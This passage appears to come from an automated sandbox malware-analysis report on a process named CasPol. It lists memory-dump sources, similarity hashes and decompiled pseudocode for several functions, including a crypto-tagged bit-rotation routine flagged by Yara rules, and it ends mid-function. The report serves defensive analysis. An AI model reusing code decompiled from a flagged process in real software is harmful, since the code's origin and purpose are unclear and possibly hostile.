                                                                        0x0147ea6f
                                                                        0x0147ea72
                                                                        0x0147ea75
                                                                        0x0147ea7a
                                                                        0x0147ea7a
                                                                        0x0147ea7e
                                                                        0x0147ea80
                                                                        0x0147ea85
                                                                        0x0147ea8b
                                                                        0x0147eab5
                                                                        0x0147eabc
                                                                        0x0147eabf
                                                                        0x0147eabf
                                                                        0x0147eaca
                                                                        0x0147eace
                                                                        0x0147ead0
                                                                        0x0147eae4
                                                                        0x0147eaeb
                                                                        0x0147eaf0
                                                                        0x0147eaf5
                                                                        0x0147eb09
                                                                        0x0147eb0d
                                                                        0x0147eb1d
                                                                        0x0147eb2d
                                                                        0x0147eb38
                                                                        0x0147eb3d
                                                                        0x0147eb41
                                                                        0x0147eb4a
                                                                        0x0147eb60
                                                                        0x0147eb4c
                                                                        0x0147eb52
                                                                        0x0147eb59
                                                                        0x0147eb59
                                                                        0x0147eb68
                                                                        0x0147eb71
                                                                        0x0147eb71
                                                                        0x0147ea8d
                                                                        0x0147ea8f
                                                                        0x0147ea92
                                                                        0x0147ea97
                                                                        0x0147ea97
                                                                        0x0147ea9b
                                                                        0x0147ea9c
                                                                        0x0147ea9e
                                                                        0x0147eaa6
                                                                        0x0147eaa6
                                                                        0x0147eb7e

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                                        • Instruction ID: b7fc5806193621c1c60181b3a07675097511d9d9f20b065a7a89e4ea4a253667
                                                                        • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                                        • Instruction Fuzzy Hash: 5B31E4326047069BC719DF28CC80AABB7AAFFD4214F044A6EF55697751DE30E809CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00403853 Relevance: .1, Instructions: 108COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00403853(signed char* __eax) {
				signed char* _t37;
				unsigned int _t65;
				unsigned int _t73;
				unsigned int _t81;
				unsigned int _t88;
				signed char _t94;
				signed char _t97;
				signed char _t100;

				_t37 = __eax;
				_t65 = ((((__eax[0xc] & 0x000000ff) << 0x00000008 | __eax[0xd] & 0x000000ff) & 0x0000ffff) << 0x00000008 | __eax[0xe] & 0xff) << 0x00000007 | (__eax[0xf] & 0x000000ff) >> 0x00000001;
				_t94 = __eax[0xb];
				if((_t94 & 0x00000001) != 0) {
					_t65 = _t65 | 0x80000000;
				}
				_t37[0xc] = _t65 >> 0x18;
				_t37[0xf] = _t65;
				_t37[0xd] = _t65 >> 0x10;
				_t73 = ((((_t37[8] & 0x000000ff) << 0x00000008 | _t37[9] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t37[0xa] & 0xff) << 0x00000007 | (_t94 & 0x000000ff) >> 0x00000001;
				_t97 = _t37[7];
				_t37[0xe] = _t65 >> 8;
				if((_t97 & 0x00000001) != 0) {
					_t73 = _t73 | 0x80000000;
				}
				_t37[8] = _t73 >> 0x18;
				_t37[0xb] = _t73;
				_t37[9] = _t73 >> 0x10;
				_t81 = ((((_t37[4] & 0x000000ff) << 0x00000008 | _t37[5] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t37[6] & 0xff) << 0x00000007 | (_t97 & 0x000000ff) >> 0x00000001;
				_t100 = _t37[3];
				_t37[0xa] = _t73 >> 8;
				if((_t100 & 0x00000001) != 0) {
					_t81 = _t81 | 0x80000000;
				}
				_t37[4] = _t81 >> 0x18;
				_t37[7] = _t81;
				_t37[5] = _t81 >> 0x10;
				_t88 = (((_t37[1] & 0x000000ff) << 0x00000008 | _t37[2] & 0x000000ff) & 0x00ffffff | ( *_t37 & 0x000000ff) << 0x00000010) << 0x00000007 | (_t100 & 0x000000ff) >> 0x00000001;
				 *_t37 = _t88 >> 0x18;
				_t37[1] = _t88 >> 0x10;
				_t37[6] = _t81 >> 8;
				_t37[2] = _t88 >> 8;
				_t37[3] = _t88;
				return _t37;
			}











                                                                        0x00403853
                                                                        0x0040387e
                                                                        0x00403880
                                                                        0x00403886
                                                                        0x00403888
                                                                        0x00403888
                                                                        0x00403894
                                                                        0x00403899
                                                                        0x0040389f
                                                                        0x004038cf
                                                                        0x004038d1
                                                                        0x004038d7
                                                                        0x004038dd
                                                                        0x004038df
                                                                        0x004038df
                                                                        0x004038ee
                                                                        0x004038f3
                                                                        0x004038f9
                                                                        0x00403924
                                                                        0x00403926
                                                                        0x0040392c
                                                                        0x00403932
                                                                        0x00403934
                                                                        0x00403934
                                                                        0x00403943
                                                                        0x0040394b
                                                                        0x0040394e
                                                                        0x00403972
                                                                        0x00403979
                                                                        0x00403980
                                                                        0x0040398c
                                                                        0x0040398f
                                                                        0x00403992
                                                                        0x00403996

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.353994530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                                                        • Instruction ID: e31d20633b43231726eebcedc7cabc7f2bcd3dedc8b658de99dff7b92833012d
                                                                        • Opcode Fuzzy Hash: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                                                        • Instruction Fuzzy Hash: F83172526586F14ED31E836D08BD675AEC18E9720174EC2FEDADA6F2F3C4988408D3A5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 014369A6 Relevance: .1, Instructions: 108COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 69%
                                                                        			E014369A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x14ad360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L013C6C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E01436BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E013F9980() >= 0) {
							E013D2280(_t56, 0x14a8778);
							_t77 = 1;
							_t68 = 1;
							if( *0x14a8774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x14a8774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E013BB6F0(0x139c338, 0x139c288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E013F9520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E013F95D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E013CFFB0(_t68, _t77, 0x14a8778);
				}
				_pop(_t78);
				return E013FB640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}
































                                                                        0x014369b5
                                                                        0x014369be
                                                                        0x014369c3
                                                                        0x014369c9
                                                                        0x014369cc
                                                                        0x014369d1
                                                                        0x014369d3
                                                                        0x014369de
                                                                        0x014369e1
                                                                        0x014369ea
                                                                        0x014369f6
                                                                        0x014369fe
                                                                        0x01436a13
                                                                        0x01436a14
                                                                        0x01436a15
                                                                        0x01436a16
                                                                        0x01436a1e
                                                                        0x01436a26
                                                                        0x01436a31
                                                                        0x01436a36
                                                                        0x01436a37
                                                                        0x01436a40
                                                                        0x01436a49
                                                                        0x01436a4a
                                                                        0x01436a53
                                                                        0x01436a59
                                                                        0x01436a5d
                                                                        0x01436a5e
                                                                        0x01436a64
                                                                        0x01436a67
                                                                        0x01436a6a
                                                                        0x01436a6d
                                                                        0x01436a70
                                                                        0x01436a77
                                                                        0x01436a7d
                                                                        0x01436a86
                                                                        0x01436a89
                                                                        0x01436a9c
                                                                        0x01436a9f
                                                                        0x01436aa2
                                                                        0x01436aa5
                                                                        0x01436aaf
                                                                        0x01436ab1
                                                                        0x01436ab8
                                                                        0x01436ab9
                                                                        0x01436abb
                                                                        0x01436abe
                                                                        0x01436ac5
                                                                        0x01436ac5
                                                                        0x01436aaf
                                                                        0x01436a40
                                                                        0x01436a26
                                                                        0x014369fe
                                                                        0x01436ace
                                                                        0x01436ad0
                                                                        0x01436ad3
                                                                        0x01436ad8
                                                                        0x01436adf
                                                                        0x01436adf
                                                                        0x01436ae8
                                                                        0x01436aef
                                                                        0x01436aef
                                                                        0x01436af9
                                                                        0x01436b06

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5e53d44de035893ca834384232107750da249e4a69857c660669079a85ef18f2
                                                                        • Instruction ID: dbdba3616a0c7f6f084d3f2f968ab7ec0a441a211f67622cf86a75105178c4ac
                                                                        • Opcode Fuzzy Hash: 5e53d44de035893ca834384232107750da249e4a69857c660669079a85ef18f2
                                                                        • Instruction Fuzzy Hash: E7413EB1D0020AAFDB14DFA9D940BFEBBF4EF89718F15812EE914A7250DB749906CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013B5210 Relevance: .1, Instructions: 107COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 85%
                                                                        			E013B5210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E013B52A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E013F95D0();
							L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E013CEB70(_t54, 0x14a79a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E013F95D0();
								L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E013CEB70(_t54, 0x14a79a0);
						}
						return _t52;
					}
					L5:
					_t33 = E013FF3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E013CEB70(_t54, 0x14a79a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E013F95D0();
							L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}














                                                                        0x013b5220
                                                                        0x013b5224
                                                                        0x01410d13
                                                                        0x01410d16
                                                                        0x01410d19
                                                                        0x013b522a
                                                                        0x013b522a
                                                                        0x013b522d
                                                                        0x013b522d
                                                                        0x013b5231
                                                                        0x013b5235
                                                                        0x013b5239
                                                                        0x01410d5c
                                                                        0x01410d62
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01410d6a
                                                                        0x01410d7b
                                                                        0x01410d7f
                                                                        0x01410d81
                                                                        0x01410d84
                                                                        0x01410d95
                                                                        0x01410d95
                                                                        0x01410d6c
                                                                        0x01410d71
                                                                        0x01410d71
                                                                        0x01410d9a
                                                                        0x00000000
                                                                        0x013b524a
                                                                        0x013b524a
                                                                        0x013b5250
                                                                        0x01410d24
                                                                        0x01410d35
                                                                        0x01410d39
                                                                        0x01410d3b
                                                                        0x01410d3e
                                                                        0x01410d50
                                                                        0x01410d50
                                                                        0x01410d26
                                                                        0x01410d2b
                                                                        0x01410d2b
                                                                        0x00000000
                                                                        0x01410d55
                                                                        0x013b5256
                                                                        0x013b525b
                                                                        0x013b5265
                                                                        0x01410da7
                                                                        0x013b526b
                                                                        0x013b526e
                                                                        0x013b5272
                                                                        0x01410db1
                                                                        0x01410db4
                                                                        0x01410dc5
                                                                        0x01410dc5
                                                                        0x013b5272
                                                                        0x013b5278
                                                                        0x013b527e
                                                                        0x013b528a
                                                                        0x013b528c
                                                                        0x013b528d
                                                                        0x00000000
                                                                        0x013b5280
                                                                        0x013b5282
                                                                        0x013b5288
                                                                        0x013b529f
                                                                        0x013b5292
                                                                        0x00000000
                                                                        0x013b5292
                                                                        0x00000000
                                                                        0x013b5288
                                                                        0x013b527e

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: bf9def65a1c78b5bc6d2edeb1ee2cb2387be4e8f7b8230ee25cbe2536019f695
                                                                        • Instruction ID: 11aab851dc40825185c37b549543ba87b4b64093126bf1fe4bd08ad0beff8705
                                                                        • Opcode Fuzzy Hash: bf9def65a1c78b5bc6d2edeb1ee2cb2387be4e8f7b8230ee25cbe2536019f695
                                                                        • Instruction Fuzzy Hash: 2931F831241605DBD7229B1CC981B7A7779FF20768F91462BF6154BAA4E770EC42C790
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013F3D43 Relevance: .1, Instructions: 106COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E013F3D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E013C7B60(0, _t61, 0x13911c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E013C7B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L013D4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}
















                                                                        0x013f3d4c
                                                                        0x013f3d50
                                                                        0x013f3d55
                                                                        0x013f3d5e
                                                                        0x0142e79a
                                                                        0x00000000
                                                                        0x0142e79a
                                                                        0x013f3d68
                                                                        0x0142e789
                                                                        0x013f3d9d
                                                                        0x013f3da3
                                                                        0x013f3daf
                                                                        0x013f3db5
                                                                        0x013f3dbc
                                                                        0x013f3dc4
                                                                        0x013f3dc9
                                                                        0x013f3dce
                                                                        0x0142e7ae
                                                                        0x0142e7ae
                                                                        0x013f3dde
                                                                        0x013f3de2
                                                                        0x013f3de7
                                                                        0x013f3e0d
                                                                        0x013f3e13
                                                                        0x013f3e16
                                                                        0x013f3e1e
                                                                        0x013f3e25
                                                                        0x013f3e28
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013f3e2a
                                                                        0x013f3e2f
                                                                        0x013f3e37
                                                                        0x013f3e37
                                                                        0x00000000
                                                                        0x013f3e37
                                                                        0x013f3e31
                                                                        0x00000000
                                                                        0x013f3e31
                                                                        0x013f3e20
                                                                        0x013f3e20
                                                                        0x013f3e35
                                                                        0x00000000
                                                                        0x013f3de9
                                                                        0x013f3de9
                                                                        0x013f3de9
                                                                        0x013f3dee
                                                                        0x013f3dfd
                                                                        0x013f3dff
                                                                        0x013f3e02
                                                                        0x013f3e05
                                                                        0x013f3e05
                                                                        0x00000000
                                                                        0x013f3df0
                                                                        0x013f3de7
                                                                        0x0142e78f
                                                                        0x0142e794
                                                                        0x013f3d79
                                                                        0x013f3d84
                                                                        0x013f3d89
                                                                        0x013f3d8e
                                                                        0x00000000
                                                                        0x0142e7a4
                                                                        0x013f3d96
                                                                        0x013f3d9a
                                                                        0x00000000
                                                                        0x013f3d9a
                                                                        0x00000000
                                                                        0x0142e794
                                                                        0x013f3d6e
                                                                        0x013f3d73
                                                                        0x00000000
                                                                        0x0142e7b5
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e23be4ba32f3dc3b467c2f900f5fc77b7102e2526a828b586821e3b8c477f422
                                                                        • Instruction ID: 6b341f7cf660037ff25db771dbe9ace06a4e37ab077c27298b0c2e141ce7dcf2
                                                                        • Opcode Fuzzy Hash: e23be4ba32f3dc3b467c2f900f5fc77b7102e2526a828b586821e3b8c477f422
                                                                        • Instruction Fuzzy Hash: 0C31D032601625DBD7258F2DC441A7BBBE4FF95718B05806EEA49DB7A0E730D880C791
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013EA61C Relevance: .1, Instructions: 106COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 78%
                                                                        			E013EA61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x1490220);
				E0140D08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x14a7b9c; // 0x0
				_t55 = L013D4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E0140D0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x14a7b10 =  *0x14a7b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x14a536c; // 0x77e15368
					if( *_t51 != 0x14a5368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x14a5368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x14a536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E013EA70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}


















                                                                        0x013ea61c
                                                                        0x013ea61e
                                                                        0x013ea623
                                                                        0x013ea628
                                                                        0x013ea62b
                                                                        0x013ea62d
                                                                        0x013ea648
                                                                        0x013ea64a
                                                                        0x013ea64f
                                                                        0x01429b44
                                                                        0x013ea6ec
                                                                        0x013ea6f1
                                                                        0x013ea6f1
                                                                        0x013ea655
                                                                        0x013ea657
                                                                        0x013ea65a
                                                                        0x013ea65d
                                                                        0x013ea662
                                                                        0x013ea663
                                                                        0x013ea667
                                                                        0x013ea668
                                                                        0x013ea66d
                                                                        0x013ea706
                                                                        0x013ea706
                                                                        0x01429bda
                                                                        0x01429be6
                                                                        0x01429beb
                                                                        0x00000000
                                                                        0x01429beb
                                                                        0x013ea679
                                                                        0x01429b7a
                                                                        0x00000000
                                                                        0x01429b7a
                                                                        0x013ea683
                                                                        0x013ea6f4
                                                                        0x013ea6f7
                                                                        0x013ea6f9
                                                                        0x013ea6fd
                                                                        0x013ea6a0
                                                                        0x013ea6a0
                                                                        0x013ea6ad
                                                                        0x013ea6af
                                                                        0x013ea6b4
                                                                        0x01429ba7
                                                                        0x01429bac
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01429bc6
                                                                        0x01429bce
                                                                        0x01429bd1
                                                                        0x01429bd3
                                                                        0x01429bd3
                                                                        0x00000000
                                                                        0x01429bd1
                                                                        0x013ea6bd
                                                                        0x013ea6c3
                                                                        0x013ea6c6
                                                                        0x013ea6d2
                                                                        0x013ea701
                                                                        0x013ea704
                                                                        0x00000000
                                                                        0x013ea704
                                                                        0x013ea6d4
                                                                        0x013ea6d6
                                                                        0x013ea6d9
                                                                        0x013ea6db
                                                                        0x013ea6e1
                                                                        0x013ea6e6
                                                                        0x013ea6e8
                                                                        0x013ea6e8
                                                                        0x013ea6ea
                                                                        0x00000000
                                                                        0x013ea6ea
                                                                        0x013ea688
                                                                        0x013ea692
                                                                        0x013ea694
                                                                        0x013ea699
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013ea69d
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: adeaa3507f4d73b88cc4f357a0e11d4e47e1d1a134a7bd18b00278ee693ef4bd
                                                                        • Instruction ID: bd37d1788244ac3928c6edb406afa13ffd2426d3d97cc238aa96116d061e9930
                                                                        • Opcode Fuzzy Hash: adeaa3507f4d73b88cc4f357a0e11d4e47e1d1a134a7bd18b00278ee693ef4bd
                                                                        • Instruction Fuzzy Hash: DD418CB5A00325DFCB15CF98C490B99BBF1BB89318F1980AAE905AF395C774A941CF50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013DC182 Relevance: .1, Instructions: 104COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 68%
                                                                        			E013DC182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E013D7D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E01488D34(_v8, _t80);
					}
					E013D2280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E013CFFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E01488833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E013CFFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E013FB180();
						if(_a4 != 0) {
							E013D2280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E013DBB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
